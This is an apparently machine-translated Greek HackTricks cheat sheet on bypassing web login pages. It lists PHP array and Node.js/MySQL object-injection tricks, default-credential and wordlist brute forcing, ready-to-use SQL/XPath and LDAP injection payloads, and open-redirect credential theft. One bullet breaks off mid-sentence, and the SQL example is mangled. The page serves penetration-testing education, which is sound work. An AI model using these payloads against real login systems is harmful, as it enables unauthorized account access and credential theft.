Login Bypass

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

RootedCON είναι το πιο σχετικό συνέδριο κυβερνοασφάλειας στην Ισπανία και ένα από τα πιο σημαντικά στην Ευρώπη. Με αποστολή την προώθηση της τεχνικής γνώσης, αυτό το συνέδριο είναι ένας ζωηρός συναντήσεων τεχνολογίας και επαγγελματιών κυβερνοασφάλειας σε κάθε ειδικότητα.

Παράκαμψη κανονικής σύνδεσης

Αν βρείτε μια σελίδα σύνδεσης, εδώ μπορείτε να βρείτε μερικές τεχνικές για να προσπαθήσετε να την παρακάμψετε:

  • Ελέγξτε για σχόλια μέσα στη σελίδα (κύλιση προς τα κάτω και προς τα δεξιά;)

  • Ελέγξτε αν μπορείτε να έχετε άμεση πρόσβαση στις περιορισμένες σελίδες

  • Ελέγξτε να μην αποστέλλετε τις παραμέτρους (μην αποστέλλετε καμία ή μόνο 1)

  • Ελέγξτε το σφάλμα σύγκρισης PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Αλλάξτε τον τύπο περιεχομένου σε json και στείλτε τιμές json (συμπεριλαμβανομένου του bool true)

  • Αν λάβετε απόκριση που λέει ότι η POST δεν υποστηρίζεται, μπορείτε να δοκιμάσετε να στείλετε το JSON στο σώμα αλλά με ένα αίτημα GET με Content-Type: application/json

  • Ελέγξτε το πιθανό σφάλμα ανάλυσης του nodejs (διαβάστε αυτό): password[password]=1

  • Το nodejs θα μετατρέψει αυτό το φορτίο σε μια ερώτηση παρόμοια με την εξής: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; που καθιστά το bit του κωδικού πρόσβασης πάντα αληθές.

  • Αν μπορείτε να στείλετε ένα αντικείμενο JSON, μπορείτε να στείλετε "password":{"password": 1} για να παρακάμψετε τη σύνδεση.

  • Να θυμάστε ότι για να παρακάμψετε αυτήν τη σύνδεση πρέπει ακόμα να γνωρίζετε και να στείλετε ένα έγκυρο όνομα χρήστη.

  • Η προσθήκη της επιλογής "stringifyObjects":true κατά την κλήση της mysql.createConnection θα αποκλείσει τελικά όλες τις απροσδόκητες συμπεριφορές όταν περνιέται το Object ως παράμετρος.

  • Ελέγξτε τα διαπιστευτήρια:

  • Προεπιλεγμένα διαπιστευτήρια της χρησιμοποιούμενης τεχνολογίας/πλατφόρμας

  • Συνηθισμένους συνδυασμούς (root, admin, password, όνομα της τεχνολογίας, προεπιλεγμένος χρήστης με έναν από αυτούς τους κωδικούς πρόσβασης).

  • Δημιουργήστε ένα λεξικό χρησιμοποιώντας το Cewl, προσθέστε το προεπιλεγμένο όνομα χρήστη και κωδικό πρόσβασης (αν υπάρχει) και δοκιμάστε να τον εξαναγκάσετε χρησιμοποιώντας όλες τις λέξεις ως **ο

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Παράκαμψη ταυτοποίησης μέσω εισροής LDAP

Εδώ μπορείτε να βρείτε αρκετά κόλπα για να παρακάμψετε την είσοδο μέσω εισροής LDAP.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Θυμήσου Με

Εάν η σελίδα έχει λειτουργία "Θυμήσου Με", ελέγξτε πώς υλοποιείται και δείτε αν μπορείτε να την καταχραστείτε για να αναλάβετε τον έλεγχο άλλων λογαριασμών.

Ανακατευθύνσεις

Οι σελίδες συνήθως ανακατευθύνουν τους χρήστες μετά την σύνδεση, ελέγξτε αν μπορείτε να αλλάξετε αυτήν την ανακατεύθυνση για να προκαλέσετε ένα Ανοικτό Ανακατεύθυνση. Ίσως μπορείτε να κλέψετε κάποιες πληροφορίες (κωδικούς, cookies...) αν ανακατευθύνετε τον χρήστη στον ιστότοπό σας.

Άλλοι Έλεγχοι

  • Ελέγξτε αν μπορείτε να απαριθμήσετε τα ονόματα χρηστών καταχρώντας τη λειτουργία σύνδεσης.

  • Ελέγξτε αν η λειτουργία αυτόματης συμπλήρωσης είναι ενεργή στον κωδικό πρόσβασης/ευαίσθητες πληροφορίες των φορμών εισαγωγής: <input autocomplete="false"

​​RootedCON είναι το πιο σχετικό συνέδριο κυβερνοασφάλειας στην Ισπανία και ένα από τα πιο σημαντικά στην Ευρώπη. Με αποστολή να προωθήσει την τεχνική γνώση, αυτό το συνέδριο είναι ένας ζωντανός σημείο συνάντησης για επαγγελματίες τεχνολογίας και κυβερνοασφάλειας σε κάθε ειδίκευση.

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Last updated